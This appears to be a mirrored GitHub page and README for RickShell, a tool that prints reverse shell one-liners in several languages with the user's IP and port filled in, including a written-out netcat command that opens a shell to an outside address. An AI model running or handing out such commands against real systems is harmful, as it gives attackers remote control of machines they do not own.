https://github.com/rickidevs/rickshell
tool that includes reverse shell commands and presents them to you easily. Readme for more details
https://github.com/rickidevs/rickshell
cybersecurity-tool oneliner-shell reverse-shell reverseshell rickidevs shell shell-script
Last synced: 10 months ago
JSON representation
tool that includes reverse shell commands and presents them to you easily. Readme for more details
- Host: GitHub
- URL: https://github.com/rickidevs/rickshell
- Owner: Rickidevs
- Created: 2024-07-26T09:16:23.000Z (almost 2 years ago)
- Default Branch: Main
- Last Pushed: 2025-04-16T15:16:01.000Z (about 1 year ago)
- Last Synced: 2025-04-16T22:09:19.999Z (about 1 year ago)
- Topics: cybersecurity-tool, oneliner-shell, reverse-shell, reverseshell, rickidevs, shell, shell-script
- Language: Python
- Homepage:
- Size: 915 KB
- Stars: 4
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: readme.md
Awesome Lists containing this project
README
# 🧬 RickShell
use one of the reverse shell commands in this tool to take ownership of the system when you find a vulnerability that you can exploit ;-)
## 📸 Screenshot
## 💡 HOW TO USE
`RickShell` command gives you the **top 10** most used shells. The tool will automatically type your ip address and a suitable port into the command.
### The following arguments can be used:
- `RickShell -p netcat` *netcat reverse shell commands.*
- `RickShell -p bash` *bash reverse shell commands.*
- `RickShell -p php` *php reverse shell commands.*
- `RickShell -p python` *python reverse shell commands.*
- `RickShell -p java` *java reverse shell commands.*
- `RickShell -p powershell` *powershell reverse shell commands.*
- `RickShell -p telnet` *telnet reverse shell commands.*
---
_these commands automatically assign your ip address and port. 🪄_
- e.g: `nc -e /bin/sh 192.168.100.23 4444 `
_but if you want to use a different ip and port, you can use the following arguments_
- `RickShell -ip 192.168.1.1 --port 4242`
- `RickShell -p bash -ip 192.168.1.1 --port 4242` etc.
---
#### 🌐 if you are going to use it in the url, use the following command. this sets your shell command for the url (-ue)
- `RickShell -ue` / `RickShell -p bash -ue` /
- `RickShell -ip 192.168.1.1 --port 4242 -ue` etc.
---
## 📜 Installation
`git clone https://github.com/Rickidevs/RickShell.git`
`cd RickShell`
`chmod +x setup.sh`
`./setup.sh`
---
## ⚖️ Disclaimer
_you are fully responsible for legal or illegal use. remember that this tool is designed for education_
---